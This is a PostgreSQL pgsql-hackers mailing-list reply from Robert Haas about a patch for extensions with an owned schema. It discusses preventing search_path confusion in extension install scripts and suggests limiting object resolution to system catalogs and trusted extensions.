Re: Extension security improvement: Add support for extensions with an owned schema - Mailing list pgsql-hackers

From Robert Haas
Subject Re: Extension security improvement: Add support for extensions with an owned schema
Date
Msg-id CA+TgmoZEqpXGdzMNW99UGPhXa8TKu5eNCBu6doAu9T3ti3P1ow@mail.gmail.com
Whole thread Raw
In response to Extension security improvement: Add support for extensions with an owned schema  (Jelte Fennema-Nio <me@jeltef.nl>)
Responses Re: Extension security improvement: Add support for extensions with an owned schema
Re: Extension security improvement: Add support for extensions with an owned schema
List pgsql-hackers
On Sat, Jun 1, 2024 at 8:08 PM Jelte Fennema-Nio <me@jeltef.nl> wrote:
> Writing the sql migration scripts that are run by CREATE EXTENSION and
> ALTER EXTENSION UPDATE are security minefields for extension authors.
> One big reason for this is that search_path is set to the schema of the
> extension while running these scripts, and thus if a user with lower
> privileges can create functions or operators in that schema they can do
> all kinds of search_path confusion attacks if not every function and
> operator that is used in the script is schema qualified. While doing
> such schema qualification is possible, it relies on the author to never
> make a mistake in any of the sql files. And sadly humans have a tendency
> to make mistakes.

I agree that this is a problem. I also think that the patch might be a
reasonable solution (but I haven't reviewed it).

But I wonder if there might also be another possible approach: could
we, somehow, prevent object references in extension scripts from
resolving to anything other than the system catalogs and the contents
of that extension? Perhaps with a control file setting to specify a
list of trusted extensions which we're also allowed to reference?

I have a feeling that this might be pretty annoying to implement, and
if that is true, then never mind. But if it isn't that annoying to
implement, it would make a lot of unsafe extensions safe by default,
without the extension author needing to take any action. Which could
be pretty cool. It would also make it possible for extensions to
safely share a schema, if desired.

--
Robert Haas
EDB: http://www.enterprisedb.com



pgsql-hackers by date:

Previous
From: "David G. Johnston"
Date:
Subject: Re: Extension security improvement: Add support for extensions with an owned schema
Next
From: jian he
Date:
Subject: Re: SQL/JSON query functions context_item doc entry and type requirement